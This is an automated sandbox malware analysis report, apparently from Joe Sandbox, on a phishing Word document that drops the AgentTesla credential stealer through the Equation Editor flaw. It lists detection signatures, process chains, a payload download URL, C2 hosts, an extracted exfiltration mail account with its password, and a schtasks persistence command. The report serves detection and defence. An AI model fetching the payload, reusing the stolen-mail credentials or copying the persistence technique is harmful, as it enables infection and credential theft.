Play interactive tour

Edit tour

Analysis Report PROFORMA INVOICE-09765434.doc

Overview

General Information

Sample Name:	PROFORMA INVOICE-09765434.doc
Analysis ID:	348459
MD5:	d99ceb3c7f74e1aef9cf5b9c6fab21a9
SHA1:	a0434766ec18e38d7262994fcd18d01d4b41b2b6
SHA256:	fb9536272584329c624805aaa8a50b88b737a9e89a8430bbc8b5d0626dda17fb
Tags:	doc
Most interesting Screenshot:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

Sigma detected: Scheduled temp file as task from temp location

Yara detected AgentTesla

Yara detected AntiVM_3

.NET source code contains potential unpacker

.NET source code contains very large array initializations

C2 URLs / IPs found in malware configuration

Contains functionality to register a low level keyboard hook

Injects a PE file into a foreign processes

Installs a global keyboard hook

Machine Learning detection for dropped file

Office equation editor drops PE file

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file access)

Uses schtasks.exe or at.exe to add and modify task schedules

Adds / modifies Windows certificates

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains functionality to detect virtual machines (SGDT)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Office Equation Editor has been started

PE file contains strange resources

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Startup

System is w7x64

WINWORD.EXE (PID: 948 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)

EQNEDT32.EXE (PID: 2288 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

powiuytrewasfdfghjkl.exe (PID: 260 cmdline: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe MD5: AA1F1EEBD208B4A2BC51CBD86C0E4FB0)

schtasks.exe (PID: 2904 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\gDgbkskgY' /XML 'C:\Users\user\AppData\Local\Temp\tmpE966.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)

powiuytrewasfdfghjkl.exe (PID: 2956 cmdline: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe MD5: AA1F1EEBD208B4A2BC51CBD86C0E4FB0)

cleanup

Malware Configuration

Threatname: Agenttesla

{"Username: ": "4Eafg", "URL: ": "http://kyefCjCDFs.com", "To: ": "mibrahim@hffiiltration.com", "ByHost: ": "mail.privateemail.com:587", "Password: ": "7KiVGMyXiXr2VlX", "From: ": "mibrahim@hffiiltration.com"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000007.00000002.2397959095.0000000000402000.00000040.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000004.00000002.2144135612.00000000033C4000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000007.00000002.2398572608.00000000023FE000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000007.00000002.2398572608.00000000023FE000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.2398959067.00000000026E9000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000007.00000002.2398959067.00000000026E9000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.2143227299.00000000021E1000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000004.00000002.2143895989.00000000031E9000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000007.00000002.2398468934.0000000002331000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000007.00000002.2398468934.0000000002331000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.2143255573.0000000002216000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: powiuytrewasfdfghjkl.exe PID: 2956	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: powiuytrewasfdfghjkl.exe PID: 2956	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: powiuytrewasfdfghjkl.exe PID: 260	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: powiuytrewasfdfghjkl.exe PID: 260	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 10 entries

Unpacked PEs

Source	Rule	Description	Author
4.2.powiuytrewasfdfghjkl.exe.21f06d4.3.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
4.2.powiuytrewasfdfghjkl.exe.33d39f0.6.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
4.2.powiuytrewasfdfghjkl.exe.34d9ca0.7.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
7.2.powiuytrewasfdfghjkl.exe.400000.1.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
4.2.powiuytrewasfdfghjkl.exe.34d9ca0.7.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
4.2.powiuytrewasfdfghjkl.exe.22b1384.4.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 1 entries

Sigma Overview

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882

Show sources

Source: Process started

Author: Florian Roth: Data: Command: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe, CommandLine: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe, NewProcessName: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe, OriginalFileName: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2288, ProcessCommandLine: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe, ProcessId: 260

Sigma detected: EQNEDT32.EXE connecting to internet

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 43.252.37.193, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2288, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165

Sigma detected: File Dropped By EQNEDT32EXE

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2288, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\E6RVLMWo0fz1jFA[1].exe

Sigma detected: Scheduled temp file as task from temp location

Show sources

Source: Process started

Author: Joe Security: Data: Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\gDgbkskgY' /XML 'C:\Users\user\AppData\Local\Temp\tmpE966.tmp', CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\gDgbkskgY' /XML 'C:\Users\user\AppData\Local\Temp\tmpE966.tmp', CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe, ParentImage: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe, ParentProcessId: 260, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\gDgbkskgY' /XML 'C:\Users\user\AppData\Local\Temp\tmpE966.tmp', ProcessId: 2904

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: http://globalteamacademy.com/docct/uzz/E6RVLMWo0fz1jFA.exe

Avira URL Cloud: Label: malware

Found malware configuration

Show sources

Source: powiuytrewasfdfghjkl.exe.2956.7.memstr

Malware Configuration Extractor: Agenttesla {"Username: ": "4Eafg", "URL: ": "http://kyefCjCDFs.com", "To: ": "mibrahim@hffiiltration.com", "ByHost: ": "mail.privateemail.com:587", "Password: ": "7KiVGMyXiXr2VlX", "From: ": "mibrahim@hffiiltration.com"}

Multi AV Scanner detection for domain / URL

Show sources

Source: globalteamacademy.com	Virustotal: Detection: 7%			Perma Link
Source: http://globalteamacademy.com/docct/uzz/E6RVLMWo0fz1jFA.exe	Virustotal: Detection: 12%			Perma Link

Multi AV Scanner detection for submitted file

Show sources

Source: PROFORMA INVOICE-09765434.doc	Virustotal: Detection: 43%			Perma Link
Source: PROFORMA INVOICE-09765434.doc	ReversingLabs: Detection: 53%

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\E6RVLMWo0fz1jFA[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\gDgbkskgY.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Joe Sandbox ML: detected

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe

Jump to behavior

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Compliance:

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Software Vulnerabilities:

Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe

Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h

4_2_002BD538

Source: global traffic

DNS query: name: globalteamacademy.com

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 43.252.37.193:80

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 43.252.37.193:80

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: http://kyefCjCDFs.com

Source: global traffic

TCP traffic: 192.168.2.22:49166 -> 198.54.122.60:587

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 04 Feb 2021 08:05:20 GMTServer: ApacheLast-Modified: Wed, 03 Feb 2021 23:50:23 GMTAccept-Ranges: bytesContent-Length: 1079808Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 e3 35 1b 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 5e 0c 00 00 1a 04 00 00 00 00 00 12 7d 0c 00 00 20 00 00 00 80 0c 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 10 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c0 7c 0c 00 4f 00 00 00 00 80 0c 00 30 16 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 10 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 18 5d 0c 00 00 20 00 00 00 5e 0c 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 30 16 04 00 00 80 0c 00 00 18 04 00 00 60 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 10 00 00 02 00 00 00 78 10 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f4 7c 0c 00 00 00 00 00 48 00 00 00 02 00 05 00 f0 87 01 00 00 6a 01 00 03 00 00 00 01 00 00 06 f0 f1 02 00 d0 8a 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 2c 00 00 0a 28 2d 00 00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 2e 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 2f 00 00 0a 00 02 16 28 30 00 00 0a 00 02 17 28 31 00 00 0a 00 02 17 28 32 00 00 0a 00 02 16 28 33 00 00 0a 00 2a 4e 00 02 28 09 00 00 06 6f 10 03 00 06 28 34 00 00 0a 00 2a 26 00 02 28 35 00 00 0a 00 2a ce 73 36 00 00 0a 80 01 00 00 04 73 37 00 00 0a 80 02 00 00 04 73 38 00 00 0a 80 03 00 00 04 73 39 00 00 0a 80 04 00 00 04 73 3a 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 3b 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 3c 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 3d 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 3e 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6

Source: Joe Sandbox View

IP Address: 198.54.122.60 198.54.122.60

Source: Joe Sandbox View

ASN Name: NETONBOARD-MYNetOnboardSdnBhd-QualityReliableCloud NETONBOARD-MYNetOnboardSdnBhd-QualityReliableCloud

Source: global traffic

TCP traffic: 192.168.2.22:49166 -> 198.54.122.60:587

Source: global traffic

HTTP traffic detected: GET /docct/uzz/E6RVLMWo0fz1jFA.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: globalteamacademy.comConnection: Keep-Alive

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{68A5A67A-6F93-4194-97B0-E6749671AC21}.tmp

Jump to behavior

Source: global traffic

Source: powiuytrewasfdfghjkl.exe, 00000007.00000002.2401436587.000000000649E000.00000004.00000001.sdmp

String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: unknown

DNS traffic detected: queries for: globalteamacademy.com

Source: powiuytrewasfdfghjkl.exe, 00000007.00000002.2398468934.0000000002331000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: powiuytrewasfdfghjkl.exe, 00000007.00000002.2398468934.0000000002331000.00000004.00000001.sdmp	String found in binary or memory: http://DynDns.comDynDNS
Source: powiuytrewasfdfghjkl.exe, 00000007.00000002.2398468934.0000000002331000.00000004.00000001.sdmp	String found in binary or memory: http://PtITHy.com
Source: powiuytrewasfdfghjkl.exe, 00000007.00000002.2403337468.0000000008030000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: powiuytrewasfdfghjkl.exe, 00000007.00000002.2403369507.0000000008056000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powiuytrewasfdfghjkl.exe, 00000007.00000002.2401436587.000000000649E000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: powiuytrewasfdfghjkl.exe, 00000007.00000002.2401436587.000000000649E000.00000004.00000001.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: powiuytrewasfdfghjkl.exe, 00000007.00000002.2401436587.000000000649E000.00000004.00000001.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: powiuytrewasfdfghjkl.exe, 00000007.00000002.2398113070.000000000070C000.00000004.00000020.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powiuytrewasfdfghjkl.exe, 00000007.00000002.2401436587.000000000649E000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: powiuytrewasfdfghjkl.exe, 00000007.00000002.2401436587.000000000649E000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: powiuytrewasfdfghjkl.exe, 00000007.00000002.2403337468.0000000008030000.00000004.00000001.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
Source: powiuytrewasfdfghjkl.exe, 00000007.00000003.2231095389.000000000653A000.00000004.00000001.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.7.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: powiuytrewasfdfghjkl.exe, 00000007.00000003.2230659663.0000000006540000.00000004.00000001.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?6e131a90bdbd3
Source: powiuytrewasfdfghjkl.exe, 00000007.00000002.2398076612.00000000006B0000.00000004.00000020.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabN
Source: powiuytrewasfdfghjkl.exe, 00000007.00000002.2398121333.000000000071D000.00000004.00000020.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/ens
Source: powiuytrewasfdfghjkl.exe, 00000007.00000002.2398572608.00000000023FE000.00000004.00000001.sdmp, powiuytrewasfdfghjkl.exe, 00000007.00000002.2398959067.00000000026E9000.00000004.00000001.sdmp	String found in binary or memory: http://kyefCjCDFs.com
Source: powiuytrewasfdfghjkl.exe, 00000007.00000002.2398744222.0000000002526000.00000004.00000001.sdmp	String found in binary or memory: http://mail.privateemail.com
Source: powiuytrewasfdfghjkl.exe, 00000007.00000002.2403337468.0000000008030000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: powiuytrewasfdfghjkl.exe, 00000007.00000002.2401436587.000000000649E000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: powiuytrewasfdfghjkl.exe, 00000007.00000002.2401436587.000000000649E000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: powiuytrewasfdfghjkl.exe, 00000007.00000002.2401436587.000000000649E000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: powiuytrewasfdfghjkl.exe, 00000007.00000002.2401436587.000000000649E000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: powiuytrewasfdfghjkl.exe, 00000007.00000002.2401436587.000000000649E000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: powiuytrewasfdfghjkl.exe, 00000007.00000002.2401436587.000000000649E000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: powiuytrewasfdfghjkl.exe, 00000007.00000002.2403337468.0000000008030000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: powiuytrewasfdfghjkl.exe, 00000007.00000002.2403337468.0000000008030000.00000004.00000001.sdmp	String found in binary or memory: http://repository.swisssign.com/0
Source: powiuytrewasfdfghjkl.exe, 00000004.00000002.2146683123.00000000055B0000.00000002.00000001.sdmp, powiuytrewasfdfghjkl.exe, 00000007.00000002.2400845972.0000000005C80000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: powiuytrewasfdfghjkl.exe, 00000004.00000002.2143227299.00000000021E1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powiuytrewasfdfghjkl.exe, 00000007.00000002.2403439988.0000000008380000.00000002.00000001.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: powiuytrewasfdfghjkl.exe, powiuytrewasfdfghjkl.exe, 00000007.00000000.2141889640.00000000000F2000.00000020.00020000.sdmp, E6RVLMWo0fz1jFA[1].exe.2.dr	String found in binary or memory: http://tempuri.org/databaseSystemDataSet.xsd
Source: powiuytrewasfdfghjkl.exe, 00000004.00000002.2146683123.00000000055B0000.00000002.00000001.sdmp, powiuytrewasfdfghjkl.exe, 00000007.00000002.2400845972.0000000005C80000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: powiuytrewasfdfghjkl.exe, 00000007.00000002.2403337468.0000000008030000.00000004.00000001.sdmp	String found in binary or memory: http://www.acabogacia.org/doc0
Source: powiuytrewasfdfghjkl.exe, 00000007.00000002.2403337468.0000000008030000.00000004.00000001.sdmp	String found in binary or memory: http://www.acabogacia.org0
Source: powiuytrewasfdfghjkl.exe, 00000007.00000002.2403337468.0000000008030000.00000004.00000001.sdmp	String found in binary or memory: http://www.ancert.com/cps0
Source: powiuytrewasfdfghjkl.exe, 00000007.00000002.2401436587.000000000649E000.00000004.00000001.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: powiuytrewasfdfghjkl.exe, 00000007.00000002.2401436587.000000000649E000.00000004.00000001.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: powiuytrewasfdfghjkl.exe, 00000007.00000002.2403337468.0000000008030000.00000004.00000001.sdmp	String found in binary or memory: http://www.disig.s
Source: powiuytrewasfdfghjkl.exe, 00000007.00000002.2403337468.0000000008030000.00000004.00000001.sdmp	String found in binary or memory: http://www.disig.s/ca_disi
Source: powiuytrewasfdfghjkl.exe, 00000007.00000002.2403337468.0000000008030000.00000004.00000001.sdmp	String found in binary or memory: http://www.e-me.lv/repository0
Source: powiuytrewasfdfghjkl.exe, 00000007.00000002.2403337468.0000000008030000.00000004.00000001.sdmp	String found in binary or memory: http://www.e-trust.be/CPS/QNcerts
Source: powiuytrewasfdfghjkl.exe, 00000007.00000002.2403369507.0000000008056000.00000004.00000001.sdmp	String found in binary or memory: http://www.echoworx.com/ca/root2/cps.pdf0
Source: powiuytrewasfdfghjkl.exe, 00000007.00000002.2403337468.0000000008030000.00000004.00000001.sdmp	String found in binary or memory: http://www.pkioverheid.nl/policies/root-policy0
Source: powiuytrewasfdfghjkl.exe, 00000007.00000002.2403337468.0000000008030000.00000004.00000001.sdmp	String found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_2_ca_II.crl
Source: powiuytrewasfdfghjkl.exe, 00000007.00000002.2403369507.0000000008056000.00000004.00000001.sdmp	String found in binary or memory: http://www.trustdst.com/certificates/policy/ACES-index.html0
Source: powiuytrewasfdfghjkl.exe, 00000007.00000002.2403337468.0000000008030000.00000004.00000001.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: powiuytrewasfdfghjkl.exe, 00000007.00000002.2401436587.000000000649E000.00000004.00000001.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: powiuytrewasfdfghjkl.exe, 00000007.00000002.2403337468.0000000008030000.00000004.00000001.sdmp	String found in binary or memory: https://www.netlock.hu/docs/
Source: powiuytrewasfdfghjkl.exe, 00000007.00000002.2401574275.000000000657F000.00000004.00000001.sdmp	String found in binary or memory: https://www.netlock.net/docs
Source: powiuytrewasfdfghjkl.exe	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: powiuytrewasfdfghjkl.exe, 00000007.00000002.2398468934.0000000002331000.00000004.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to register a low level keyboard hook

Show sources

Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe

Code function: 7_2_02183E50 SetWindowsHookExW 0000000D,00000000,?,?

7_2_02183E50

Installs a global keyboard hook

Show sources

Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe

Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

System Summary:

.NET source code contains very large array initializations

Show sources

Source: 7.2.powiuytrewasfdfghjkl.exe.400000.1.unpack, u003cPrivateImplementationDetailsu003eu007bD0ECA154u002d0518u002d4D82u002dA2DCu002d4A888678F2A0u007d/u003100E7F6Eu002d72D4u002d4076u002d83E1u002dE90DA212F0AA.cs

Large array initialization: .cctor: array initializer size 11941

Office equation editor drops PE file

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\E6RVLMWo0fz1jFA[1].exe			Jump to dropped file

Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior

Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Code function: 4_2_000F77E7	4_2_000F77E7
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Code function: 4_2_002BD29D	4_2_002BD29D
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Code function: 4_2_002B1CE0	4_2_002B1CE0
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Code function: 4_2_002B9DF0	4_2_002B9DF0
Source: C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe	Code function: 4_2_002B39E8	4_2_002B39E8
